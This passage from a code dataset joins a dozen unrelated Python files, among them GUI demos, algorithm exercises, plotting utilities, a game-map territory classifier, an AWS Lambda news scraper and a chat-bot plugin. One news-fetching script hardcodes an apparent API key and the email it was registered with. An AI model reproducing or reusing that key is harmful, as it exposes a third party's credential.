tk.Button (top, text = \" Info \", command = InfoCallBack, fg=\"Green\", bg=\"gray\")\r\nbtnInfo = tk.Button (top, text = \" Info \", command = InfoCallBack, fg=\"#ff0000\", bg=colorBG, justify=\"right\", width=20)\r\n\r\nbtnHello.grid()\r\nbtnInfo.grid()\r\n\r\n\r\nbtn1 = tk.Button (top, text=\"New Button\")\r\nbtn1.grid()\r\n\r\ntop.mainloop() \r\n\r\n\r\n# NOTE:\r\n# https://mail.python.org/pipermail//tkinter-discuss/2011-August/002916.html\r\n# - tkMessageBox has been renamed to messagebox in Python 3.x.\r\n# - Module is not available in tkinter\r\n# - code : from tkinter import messagebox\r\n\r\n# http://www.tutorialspoint.com/python/tk_button.htm\r\n# http://www.tutorialspoint.com/python/python_gui_programming.htm # GUI Programming\r\n#\r\n# http://www.tutorialspoint.com/python/tk_colors.htm\r\n#\r\n","sub_path":"tkinter/tkinter_grid/Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"480077964","text":"# (7) Prime Miniers of the UK\r\n\r\ntextFile = open(\"UKPrimeMiniser.txt\", \"w\")\r\n\r\n#print(\"(Debug) Writing to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\n\r\ntextFile.write(\"Last seven UK Prime Minisers and term of office. \\n\")\r\ntextFile.write(\"\\n\")\r\ntextFile.write(\"Boris Johnson -> 2019 - current \\n\")\r\ntextFile.write(\"Theresa May -> 2016 - 2019 \\n\")\r\ntextFile.write(\"David Cameron -> 2010 - 2016 \\n\")\r\ntextFile.write(\"Gordon Brown -> 2007 - 2010 \\n\")\r\ntextFile.write(\"Tony Blair -> 1997 - 2007 \\n\")\r\ntextFile.write(\"John Major -> 1990 - 1997 \\n\")\r\ntextFile.write(\"Mararet Thatcher -> 1979 - 1990 \\n\")\r\n#print(\"(Debug) Writen to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\ntextFile.close()\r\n\r\ntextFile = open(\"UKPrimeMiniser.txt\", \"r\")\r\n#print(\"(Debug) Reading to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\nprint(textFile.read())\r\ntextFile.close()\r\n","sub_path":"Text File Work/Prime Minsters UK.py","file_name":"Prime Minsters UK.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"219187863","text":"# figure out how to request an article and its headline\n# method to be used in keywordExtractor\n# should pull headlines \n# get URL of where the headlines exist\n\n# Pair programming Authors: \n# Driver: Niran Prajapati\n# Observer: Alexandra Garton\n\nfrom newsapi import NewsApiClient\n\nfrom logTool import Log\n\n\ndef get_headlines(source):\n \n newsApi = NewsApiClient(api_key = '3bd762aea6134796b564d8e18df60cf8') # handle authentication with a News API key (registered using zjcarvin@outlook.com)\n titles = []\n urls = []\n\n try:\n \t# get top headlines from \"source\"\n \ttop_headlines = newsApi.get_top_headlines(sources = source, language = 'en')\n except Exception as e:\n \tLog('error', repr(e))\n else:\n \tnum_articles = len(top_headlines['articles'])\n\n \tif (num_articles > 0):\n \t\t# get and append all article URL's\n \t\tfor i in range(num_articles):\n \t\t\ttitles.append(top_headlines['articles'][i]['title'])\n \t\t\turls.append(top_headlines['articles'][i]['url'])\n \telse:\n \t\tLog('warning', 'The top headline list is empty.')\n \n return titles, urls\n\n############ END OF FEATURE ############ \n\n# test purposes only\nif __name__ == '__main__':\n\tprint(get_headlines('bbc-news'))","sub_path":"SpotifyNews/pullNews.py","file_name":"pullNews.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"161327687","text":"'''\nSo went to a Casino recently. I noticed at the Blackjack tables the house tends\nto use several decks and not 1. My mind began to wonder about how likely natural\nblackjacks (getting an ace and a card worth 10 points on the deal) can occur.\n\nSo for this monday challenge lets look into this. We need to be able to shuffle\ndeck of playing cards. (52 cards) and be able to deal out virtual 2 card hands\nand see if it totals 21 or not.\n\n Develop a way to shuffle 1 to 10 decks of 52 playing cards.\n Using this shuffle deck(s) deal out hands of 2s\n count how many hands you deal out and how many total 21 and output the percentage.\n\nInput:\n\nn: being 1 to 10 which represents how many deck of playing cards to shuffle together.\nOutput:\n\nAfter x hands there was y blackjacks at z%.\nExample Output:\n\nAfter 26 hands there was 2 blackjacks at %7.\n\n'''\nimport random\n\ndeck = {'Ace': 11,\n 'King': 10,\n 'Queen': 10,\n 'Jack': 10,\n 'Ten': 10,\n 'Nine': 9,\n 'Eight': 8,\n 'Seven': 7,\n 'Six': 6,\n 'Five': 5,\n 'Four': 4,\n 'Three': 3,\n 'Two': 2\n }\n\nwin =0\nlose = 0\nlst = []\nacc = 0\nhands = 0\nwhile hands < 26:\n acc = 0\n lst = []\n while acc < 2:\n # key/value pair\n candidate = random.choice(list(deck.keys()))\n # value\n valu = deck.get(candidate)\n lst.append(valu)\n acc += 1\n score = sum(lst)\n if score == 21:\n win += 1\n else:\n lose += 1\n hands += 1\n score = 0\n#print(win,lose)\n\nprint('After 26 hands there were ' + str(win) + ' blackjacks at ' + str(round(win/26 * 100, 2)) + '%')","sub_path":"albums/3/challenge161_easy/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"583660386","text":"# Given a binary tree and a number sequence, find if the sequence is present\n# as a root-to-leaf path in the given tree.\n\n\ndef find_path(root, sequence):\n if not root and not sequence:\n return True\n\n def dfs(root, sequence, curr):\n if not root:\n return sequence == curr\n curr.append(root.val)\n left = dfs(root.left, sequence, curr)\n right = dfs(root.right, sequence, curr)\n curr.pop()\n return left or right\n\n return dfs(root, sequence, [])\n","sub_path":"tree dfs/4.path_with_given_sequence.py","file_name":"4.path_with_given_sequence.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"131795074","text":"from lie_learn.representations.SO3.spherical_harmonics import rsh\nimport numpy as np\nimport plotly\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nfrom plotly.graph_objs.layout.scene import *\nimport os\nimport matplotlib.pyplot as plt\n\n#plotly.tools.set_credentials_file(username=os.environ['plotly_user'], api_key=os.environ['plotly_key'])\n\nDEFAULT_AXIS = dict(showbackground=True,\n backgroundcolor=\"rgb(230, 230,230)\",\n gridcolor=\"rgb(255, 255, 255)\",\n zerolinecolor=\"rgb(255, 255, 255)\",\n )\n\nDEFAULT_LAYOUT = Layout(showlegend=False,\n width=500,\n height=500)\n\ndef get_random_coords(rnd, num_coords):\n coords = rnd.randn(num_coords,3)\n coords /= np.linalg.norm(coords, axis=-1, keepdims=True)\n# No origin for now\n# coords = np.concatenate((coords, [[0., 0., 0.]]), axis=0)\n return coords\n\ndef xyz_to_phi_theta(x):\n phi = np.arccos(x[...,2] / np.linalg.norm(x, axis=-1))\n theta = np.arctan2(x[..., 0], x[..., 1])\n return phi, theta\n\ndef get_Ylm_coeffs(phi, theta, L_max=5, sum=True):\n Ls = np.array([l for l in range(0, L_max + 1, 1) for m in range(-l, l+1)])\n Ls = Ls.reshape(*[-1, *np.ones(len(phi.shape), dtype=int)])\n Ms = np.array([m for l in range(0, L_max + 1, 1) for m in range(-l, l+1)])\n Ms = Ms.reshape(*[-1, *np.ones(len(phi.shape), dtype=int)])\n ylms = rsh(Ls, Ms, np.expand_dims(phi, axis=0), np.expand_dims(theta, axis=0))\n if sum:\n return np.sum(ylms, axis=-1)\n else:\n return ylms\n\ndef spherical_plotly_trace(coeff, L_max, num_angular_points=200):\n phi = np.expand_dims(np.linspace(0, np.pi, num_angular_points), axis=0)\n theta = np.expand_dims(np.linspace(0, 2 * np.pi, num_angular_points), axis=-1)\n \n # Phi is 0 to pi and theta 0 to 2 pi\n x = np.sin(phi) * np.sin(theta)\n y = np.sin(phi) * np.cos(theta)\n z = np.cos(phi) * np.ones(theta.shape)\n \n Ls = np.expand_dims(np.expand_dims(\n np.array([l for l in range(0, L_max + 1, 1) for m in range(-l, l+1)]), axis=-1), axis=-1)\n Ms = np.expand_dims(np.expand_dims(\n np.array([m for l in range(0, L_max + 1, 1) for m in range(-l, l+1)]), axis=-1), axis=-1)\n coeff = np.expand_dims(np.expand_dims(coeff, axis=-1), axis=-1)\n Ys = np.sum(coeff * rsh(Ls, Ms, np.expand_dims(phi, axis=0), np.expand_dims(theta, axis=0)), axis=0)\n return x, y, z, Ys\n\ndef visualize_spharm_and_coords(real_coords, pred_coord, L_max=8, num_angular_points=200):\n\n angles = xyz_to_phi_theta(real_coords)\n coeffs = get_Ylm_coeffs(*angles, L_max=L_max)\n print(coeffs.shape)\n x, y, z, Y_signal = spherical_plotly_trace(coeffs, L_max=L_max, num_angular_points=num_angular_points)\n \n x2, y2, z2 = real_coords[:, 0], real_coords[:, 1], real_coords[:, 2]\n x3, y3, z3 = pred_coord[:, 0], pred_coord[:, 1], pred_coord[:, 2]\n \n trace = Surface(x=x,\n y=y,\n z=z,\n showscale=True, \n surfacecolor=Y_signal,\n opacity=0.75)\n \n trace2 = Scatter3d(x=x2,\n y=y2,\n z=z2, mode='markers')\n\n trace3 = Scatter3d(x=x3,\n y=y3,\n z=z3, mode='markers')\n \n data = [trace, trace2, trace3]\n fig = Figure(data=data, layout=DEFAULT_LAYOUT)\n return fig\n\ndef visualize_coeff_series(coeffs, L_max=8, num_angular_points=200, cmin=None, cmax=None): \n make_trace = lambda x: spherical_plotly_trace(x, L_max=L_max, num_angular_points=num_angular_points)\n data = data = [Surface(x=x, y=y, z=z, visible=False, name = 'x= '+str(step),\n showscale=True, surfacecolor=Y_signal, cmin=cmin, cmax=cmax) \n for step, (x, y, z, Y_signal) in zip(range(len(coeffs)), map(make_trace, coeffs))] \n\n data[0]['visible'] = True\n \n steps = []\n for i in range(len(data)):\n step = dict(\n method = 'restyle', \n args = ['visible', [False] * len(data)],\n )\n step['args'][1][i] = True # Toggle i'th trace to \"visible\"\n steps.append(step)\n \n sliders = [dict(\n active = 0,\n currentvalue = {\"prefix\": \"x: \"},\n pad = {\"t\": 50},\n steps = steps\n )]\n \n layout = dict(sliders=sliders)\n fig = dict(data=data, layout=layout)\n return fig \n","sub_path":"linus/sph_projection_utils.py","file_name":"sph_projection_utils.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"252848360","text":"# Adding Two Negabinary Numbers\n# Given two numbers arr1 and arr2 in base -2, return the result of adding them together.\n# Each number is given in array format: as an array of 0s and 1s, from most significant bit to least significant bit. \n# For example, arr = [1,1,0,1] represents the number (-2)^3 + (-2)^2 + (-2)^0 = -3. A number arr in array format is also \n# guaranteed to have no leading zeros: either arr == [0] or arr[0] == 1.\n\n# Return the result of adding arr1 and arr2 in the same format: as an array of 0s and 1s with no leading zeros.\n\n# conditions\n# 1 <= arr1.length <= 1000\n# 1 <= arr2.length <= 1000\n# arr1 and arr2 have no leading zeros\n# arr1[i] is 0 or 1\n# arr2[i] is 0 or 1\n\n# code\nclass Solution: \n def addNegabinary(self, arr1: List[int], arr2: List[int]) -> List[int]:\n count = [0] * 2000\n n1 = len(arr1)\n n2 = len(arr2)\n for i, x in enumerate(arr1):\n actual = n1 - i - 1\n if x: count[actual] += 1\n for i, x in enumerate(arr2):\n actual = n2 - i - 1\n if x: count[actual] += 1\n for i in range(1500):\n while count[i] > 1:\n if count[i + 1]:\n count[i] -= 2\n count[i + 1] -= 1\n else:\n count[i] -= 2\n count[i + 1] += 1\n count[i + 2] += 1\n count.reverse()\n if 1 not in count: return [0]\n return count[count.index(1):]\n","sub_path":"Exercises/addNegabinary.py","file_name":"addNegabinary.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330201496","text":"'''\n\t@ Travis Drake (EklipZ) eklipz.io - tdrake0x45 at gmail)\n\tApril 2017\n\tGenerals.io Automated Client - https://github.com/harrischristiansen/generals-bot\n\tEklipZ bot - Tries to play generals lol\n'''\n\nimport logging\nimport time\nimport json\nfrom SearchUtils import *\nfrom test.test_float import INF\n\nfrom base.client.map import new_map_matrix\n\n\n# attempts to classify tiles into territories.\nclass TerritoryClassifier():\n\tdef __init__(self, map):\n\t\tself.territories = [None for player in map.players]\n\t\tself.map = map\n\t\tself.lastCalculatedTurn = -1\n\t\tself.territoryMap = new_value_matrix(self.map, -1)\n\t\tself.needToUpdateAroundTiles = set()\n\t\tfor tile in self.map.pathableTiles:\n\t\t\tself.needToUpdateAroundTiles.add(tile)\n\n\tdef __getstate__(self):\n\t\tstate = self.__dict__.copy()\n\t\tif \"map\" in state:\n\t\t\tdel state[\"map\"]\n\t\treturn state\n\n\tdef __setstate__(self, state):\n\t\tself.__dict__.update(state)\n\t\tself.map = None\n\n\tdef should_recalculate(self, turn):\n\t\tif len(self.needToUpdateAroundTiles) > 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef revealed_tile(self, tile):\n\t\t\"\"\"\n\t\tWhen a tile is initially discovered, it should be used to weight territories as the player\n\t\tit was discovered as (to prevent the creep of neutral weighted discovery).\n\t\tNote that this gets immediately overwritten by the actual territory value for this tile,\n\t\tit is just used to weight the tiles around it during that cycle.\n\t\t\"\"\"\n\t\tself.territoryMap[tile.x][tile.y] = tile.player\n\t\tif tile.player != -1:\n\t\t\tfor movable in tile.movable:\n\t\t\t\tif not movable.discovered:\n\t\t\t\t\tself.territoryMap[movable.x][movable.y] = tile.player\n\n\tdef scan(self):\n\t\tlogging.info(\"Scanning map for territories, aww geez\")\n\t\tcounts = new_map_matrix(self.map, lambda x,y: [0 for n in range(len(self.map.players)+1)])\n\t\tstartTime = time.time()\n\t\tundiscoveredCounterDepth = 5\n\t\t# count the number of tiles for each player within range 3 to determine whose territory this is\n\t\tneutralNewIndex = len(self.map.players)\n\t\t\n\t\t# do a BFS foreach within a BFS foreach. Normal everyday stuff nbd\n\t\tdef foreach_near_updated_tiles(evaluatingTile):\n\t\t\tdef countFunc(tile):\n\t\t\t\tif tile.isMountain:\n\t\t\t\t\treturn\n\t\t\t\t\n\t\t\t\tcurrentTerritory = self.territoryMap[tile.x][tile.y]\n\t\t\t\tif not evaluatingTile.discovered:\n\t\t\t\t\t# weight based on territory already owned, making it harder to flip a territory (and hopefully better encapsulate who owns what)\n\t\t\t\t\tif currentTerritory != -1:\n\t\t\t\t\t\t# do NOT allow our player to own undiscovered territory. If owned by us, is neutral.\n\t\t\t\t\t\t# This prevents the undiscovered-tile-friendly-territory cascade from happening.\n\t\t\t\t\t\tif tile.discovered and not evaluatingTile.discovered and currentTerritory != self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][currentTerritory] += 0.3\n\t\t\t\t\t\telif currentTerritory == self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][neutralNewIndex] += 0.06\n\t\t\t\t\telse:\n\t\t\t\t\t\t# only discovered neutral tiles count, and only if we're trying to classify a neutral tile.\n\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][neutralNewIndex] += 0.02\n\t\t\t\telse:\n\t\t\t\t\t# undiscovereds count for the evaluating tile player\n\t\t\t\t\tif not tile.discovered:\n\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][evaluatingTile.player] += 0.2\n\t\t\t\t\telse:\n\t\t\t\t\t\tpIndex = tile.player\n\t\t\t\t\t\tif pIndex != -1 and pIndex != self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][pIndex] += 1\n\t\t\t\t\t\telif pIndex != -1: \n\t\t\t\t\t\t\t# weight our tiles less because we see more of them.\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][pIndex] += 0.8\n\t\t\t\t\n\t\t\tskip = lambda tile: tile.player == -1 and tile.discovered\n\t\t\tbreadth_first_foreach(self.map, [evaluatingTile], undiscoveredCounterDepth, countFunc, skipFunc = skip, noLog = True)\n\t\t\tmaxPlayer = -1\n\t\t\tmaxValue = 0\n\t\t\tfor pIndex, value in enumerate(counts[evaluatingTile.x][evaluatingTile.y]):\n\t\t\t\tif value > maxValue:\n\t\t\t\t\tmaxPlayer = pIndex\n\t\t\t\t\tmaxValue = value\n\t\t\tuserName = \"Neutral\"\n\t\t\t\t\n\t\t\t# convert back to -1 index for neutral\n\t\t\tif maxPlayer == neutralNewIndex:\n\t\t\t\tmaxPlayer = -1\n\t\t\telse:\n\t\t\t\tuserName = self.map.usernames[maxPlayer]\n\n\t\t\tif evaluatingTile.player != maxPlayer and evaluatingTile.player != -1:\n\t\t\t\tlogging.info(\"Tile {} is in player {} {} territory\".format(evaluatingTile.toString(), maxPlayer, userName))\n\t\t\t\n\n\t\t\tself.territoryMap[evaluatingTile.x][evaluatingTile.y] = maxPlayer\n\t\tstartTiles = list(self.needToUpdateAroundTiles)\n\t\tlogging.info(\" Scanning territory around {}\".format(\" - \".join([tile.toString() for tile in startTiles])))\n\t\tbreadth_first_foreach(self.map, startTiles, undiscoveredCounterDepth, foreach_near_updated_tiles, None, lambda tile: tile.isMountain, None, self.map.player_index)\n\t\tduration = time.time() - startTime\n\t\t\t\n\t\tlogging.info(\"Completed scanning territories in {:.3f}\".format(duration))\n\t\tself.needToUpdateAroundTiles = set()","sub_path":"Territory.py","file_name":"Territory.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"219003873","text":"# Copyright 2020 Alex Woroschilow (alex.woroschilow@gmail.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nimport configparser\nimport glob\nimport os\nimport pathlib\n\nimport hexdi\n\nconsole = hexdi.resolve('console')\nif not console: raise Exception('Console service not found')\ndescription = \"Remove abandoned .desktop files and icons\"\n\n\n@console.task(name=['cleanup', 'clear'], description=description)\ndef main(options=None, args=None):\n integration = '/usr/share' if options.systemwide else \\\n os.path.expanduser('~/.local/share')\n\n config = configparser.RawConfigParser()\n config.optionxform = str\n\n existed = []\n for desktop in glob.glob('{}/applications/*.desktop'.format(integration)):\n if os.path.isdir(desktop):\n continue\n\n yield console.green(\"[found]: {}\".format(console.comment(os.path.basename(desktop))))\n\n desktop_name = pathlib.Path(desktop)\n desktop_name = desktop_name.stem\n\n config.read(desktop)\n\n property_exec = config.get('Desktop Entry', 'Exec')\n property_exec = property_exec.split(' ')\n property_exec = property_exec.pop(0)\n\n property_exec_name = pathlib.Path(property_exec)\n property_exec_name = property_exec_name.stem\n\n if property_exec_name != desktop_name:\n yield console.warning(\"[removing]: {}, binary name is not the same as the .desktop file name...\".\n format(os.path.basename(desktop)))\n os.remove(desktop)\n continue\n\n if not os.path.exists(property_exec):\n yield console.warning(\"[removing]: {}, binary not found...\".format(os.path.basename(desktop)))\n os.remove(desktop)\n continue\n\n existed.append(config.get('Desktop Entry', 'Icon'))\n continue\n\n for icon in glob.glob('{}/icons/*'.format(integration)):\n if os.path.isdir(icon):\n continue\n\n yield console.green(\"[found]: {}\".format(console.comment(os.path.basename(icon))))\n\n icon = pathlib.Path(icon)\n if icon.stem in existed:\n continue\n\n yield console.warning(\"[removing]: {}, .desktop file not found...\".\n format(os.path.basename(icon)))\n\n os.remove(icon)\n continue\n\n return 0\n","sub_path":"src/plugins/cmd_command_cleanup/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460013440","text":"import logging\nimport boto3\nimport os\nimport pytz\nimport requests\nimport json\nimport feedparser\nfrom requests import RequestException\nfrom datetime import datetime\nfrom common_lib import detailed_exception, get_adjusted_unix_time\n\n# Log level\nlogging.basicConfig()\nLOGGER = logging.getLogger()\nif os.environ[\"DEBUG_MODE\"] == \"true\":\n LOGGER.setLevel(logging.DEBUG)\nelse:\n LOGGER.setLevel(logging.INFO)\n\n# Get AWS region and necessary clients\nNEWS_TABLE = os.environ[\"NEWS_TABLE_NAME\"]\nEXPIRY_DAYS_OFFSET = int(os.environ[\"DOCUMENT_EXPIRY_DAYS\"])\nDYNAMODB_RESOURCE = boto3.resource(\"dynamodb\")\nSSM_CLIENT = boto3.client(\"ssm\")\nS3_CLIENT = boto3.client(\"s3\")\nS3_BUCKET_NAME = os.environ[\"BUCKET_NAME\"]\n\n\ndef news_parser(news_json: dict):\n \"\"\"\n Given a news JSON item from the unaltered API Response, it retains specific information and creates a JSON formatted\n dictionary containing data needed by the DynamoDB table. Variable names for the dictionary are in camelCase.\n\n :param news_json: Unaltered JSON item from UBCO news API Response\n :return: JSON formatted item for DynamoDB storage\n \"\"\"\n parsed_news = {\n \"newsId\": str(news_json.get(\"post-id\", \"Null\")),\n \"title\": news_json.get(\"title\", \"Null\"),\n \"link\": news_json.get(\"id\", \"Null\"),\n \"summary\": news_json.get(\"summary\", \"Null\"),\n \"mediaThumbnail\": news_json.get(\"media_thumbnail\", []),\n \"categories\": [category[\"term\"] for category in news_json[\"tags\"]],\n \"dateModified\": str(datetime.strptime(news_json[\"published\"].split(\",\")[1][1:-6], \"%d %b %Y %H:%M:%S\"))\n }\n return parsed_news\n\n\ndef get_news_items_from_web(news_link: str):\n \"\"\"\n Makes a network request to the news RSS Feed and returns the result of the request.\n Logs a network error if any an returns an empty list in that case\n :param news_link: URL for the new RSS Feed\n :return: List of news items\n \"\"\"\n json_response = []\n try:\n feed_response = requests.get(news_link).text\n json_response = feedparser.parse(feed_response)[\"entries\"]\n except RequestException as e:\n LOGGER.error(\"Network error in getting RSS Feed\")\n detailed_exception(LOGGER)\n return json_response\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Lambda entry-point\n \"\"\"\n news_link = \"https://news.ok.ubc.ca/feed/\"\n news_items = []\n filtered_news_items = []\n\n response_items = get_news_items_from_web(news_link)\n if len(response_items) == 0:\n return {\"status\": \"No items in RSS Feed\"}\n\n # Iterate through list of raw items and parse them, if there is a parsing error, save the raw item that throws an\n # error to S3\n for item in response_items:\n try:\n news_item = news_parser(item)\n news_items.append(news_item)\n except Exception as e:\n S3_CLIENT.put_object(Body=json.dumps(item, indent=4), Bucket=S3_BUCKET_NAME,\n Key=f'ErrorLog/News/{str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13]}.json')\n LOGGER.error(f\"Error in parsing a news item, raw item saved to {S3_BUCKET_NAME}/ErrorLog/News\")\n detailed_exception(LOGGER)\n\n # Filter the parsed items based on last query time to get only new items\n try:\n last_query_time = SSM_CLIENT.get_parameter(Name=\"NewsQueryTime\")[\"Parameter\"][\"Value\"]\n for news_item in news_items:\n if datetime.strptime(last_query_time, \"%Y-%m-%d %H:%M:%S\") \\\n < datetime.strptime(news_item[\"dateModified\"], \"%Y-%m-%d %H:%M:%S\"):\n filtered_news_items.append(news_item)\n SSM_CLIENT.put_parameter(Name=\"NewsQueryTime\",\n Value=str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13],\n Overwrite=True)\n except SSM_CLIENT.exceptions.InternalServerError as e:\n LOGGER.error(\"Error in communicating with Parameter store\")\n detailed_exception(LOGGER)\n\n LOGGER.debug(json.dumps(news_items, indent=4))\n LOGGER.debug(json.dumps(filtered_news_items, indent=4))\n\n # Save new items to central data lake S3\n if len(filtered_news_items) != 0:\n S3_CLIENT.put_object(Body=json.dumps(filtered_news_items, indent=4), Bucket=S3_BUCKET_NAME,\n Key=f'News/{str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13]}.json')\n\n # Insert items into DynamoDB table with appropriate TTL\n table = DYNAMODB_RESOURCE.Table(NEWS_TABLE)\n for events_item in filtered_news_items:\n events_item[\"expiresOn\"] = get_adjusted_unix_time(events_item[\"dateModified\"], \"%Y-%m-%d %H:%M:%S\",\n EXPIRY_DAYS_OFFSET * 24)\n table.put_item(Item=events_item)\n\n return {\"status\": \"completed\"}\n\n","sub_path":"functions/get_news_data/get_news_data.py","file_name":"get_news_data.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31526574","text":"#!/usr/bin/env python3\n\n\nimport requests\nimport random\n\n\nclass Plugin:\n def __init__(self, bot):\n self.bot = bot\n bot.register_command(__name__, ['giphy', 'gp'], self.giphy,\n channels=['!##monsterhunter'])\n\n def giphy(self, server, user, channel, *query):\n \"\"\"Searches giphy and returns a random result.\"\"\"\n query = ' '.join(query)\n key = self.bot.settings['giphy_key']\n req = requests.get('http://api.giphy.com/v1/gifs/search?q={}'\n '&api_key={}'.format(query, key))\n data = req.json()\n if data['data'] == []:\n return '[\\x035Giphy\\x03] No results'\n images = random.choice(data['data'])['images']\n return '[\\x033Giphy\\x03] {}'.format(images['original']['url'])\n\n\n","sub_path":"plugins/giphy.py","file_name":"giphy.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"616564774","text":"#-*- encoding: utf-8 -*-\n\nimport sys\nreload(sys).setdefaultencoding(\"utf8\")\n\nimport urllib\nimport urllib2\nimport json\n\ndef reply(url, s):\n try:\n response = urllib2.urlopen(url)\n data = response.read()\n result = json.loads(data.decode(\"utf8\"))\n if result['source']:\n \tre = result['hitokoto'] + \" —— \" + result['author'] + \",\" + result['source']\n else:\n \tre = result['hitokoto'] + \" —— \" + result['author']\n return re.decode(\"utf8\")\n except:\n return \"玩坏掉了。\"","sub_path":"function/webapi/maxim.py","file_name":"maxim.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10163892","text":"from fix_typos import fix_typos\nimport re\n\ndef comment_to_tokens(comment):\n\ttokens = []\n\tlines = comment.split('\\n')\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tif line:\n\t\t\tline = line.lower()\n\t\t\tline = fix_typos(line)\n\t\t\tline_tokens = str_to_tokens(line)\n\t\t\tif line_tokens:\n\t\t\t\ttokens.extend(line_tokens)\n\t\t\t\ttokens.append('')\n\tif tokens and tokens[-1] != '':\n\t\ttokens.append('')\n\treturn tokens\n\ndef str_to_tokens(s):\n\ttokens = []\n\tfor token in s.split(' '):\n\t\tprocess_token(token, tokens)\n\treturn tokens\n\ndef process_token(token, tokens):\n\ttoken = token.strip()\n\tif not token:\n\t\treturn False\n\n\ttoken = token.strip()\n\tif not token:\n\t\treturn False\n\tif not re.search('[a-zа-яё0-9\\-_–:()^=>$/]', token):\n\t\treturn False\n\n\tif re.match('>+.', token):\n\t\ttokens.append('>')\n\t\treturn process_token(re.sub('^>+', '', token), tokens)\n\n\tif re.fullmatch('[a-fole0-9]{32,}', token):\n\t\treturn False\n\tif re.fullmatch('[a-z0-9.\\-]+@[a-z0-9.\\-]+', token):\n\t\ttokens.append('ti.hui@i.pidor.com')\n\t\treturn True\n\tif token.startswith('chrome://flags'):\n\t\ttokens.append(token)\n\t\treturn True\n\tif re.fullmatch('(https?://)?[a-z0-9.\\-]+\\.(com|net|ru|onion|org)/?[a-zа-яё0-9:/\\-.?=_#$%]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('т\\.[еодп]\\.?', token):\n\t\ttokens.append(re.sub('\\.?$', '.', token))\n\t\treturn True\n\tif re.fullmatch('.*?[0-9]*т\\.р\\.?', token):\n\t\tif re.search('[0-9]', token):\n\t\t\ttokens.append('т.р.')\n\t\telse:\n\t\t\ttokens.append('т.р.')\n\t\treturn True\n\tif token == '9000':\n\t\ttokens.append(token)\n\t\treturn True\n\tif re.fullmatch('[0-9][\\-+.0-9]*', token):\n\t\ttokens.append('')\n\t\treturn True\n\tif re.match('[0-9][\\-+.0-9]*[\\-/$]*[a-zа-яё]+', token):\n\t\ttokens.append('')\n\t\tsts = re.sub('^[\\-+.0-9]*[0-9](-?)(\\$?)(/?)', '\\\\1 \\\\2 \\\\3 ', token).split(' ')\n\t\tfor st in sts:\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\tif token == '(нет)':\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('.*?:\\)+', token):\n\t\tprocess_token(re.sub(':\\)+$', '', token), tokens)\n\t\ttokens.append(':)')\n\t\treturn True\n\tif re.fullmatch('.*?:\\(+', token):\n\t\tprocess_token(re.sub(':\\(+$', '', token), tokens)\n\t\ttokens.append(':(')\n\t\treturn True\n\tif re.fullmatch('.*?:d+', token):\n\t\tprocess_token(re.sub(':d+$', '', token), tokens)\n\t\ttokens.append(':d')\n\t\treturn True\n\tif re.fullmatch('.*?xd+', token):\n\t\tprocess_token(re.sub('xd+$', '', token), tokens)\n\t\ttokens.append('xd')\n\t\treturn True\n\tif re.fullmatch('.*?:[3з]', token):\n\t\tprocess_token(re.sub(':[3з]+$', '', token), tokens)\n\t\ttokens.append(':3')\n\t\treturn True\n\tif re.fullmatch('.*?\\^_\\^', token):\n\t\tprocess_token(re.sub('\\^_\\^+$', '', token), tokens)\n\t\ttokens.append('^_^')\n\t\treturn True\n\n\tif 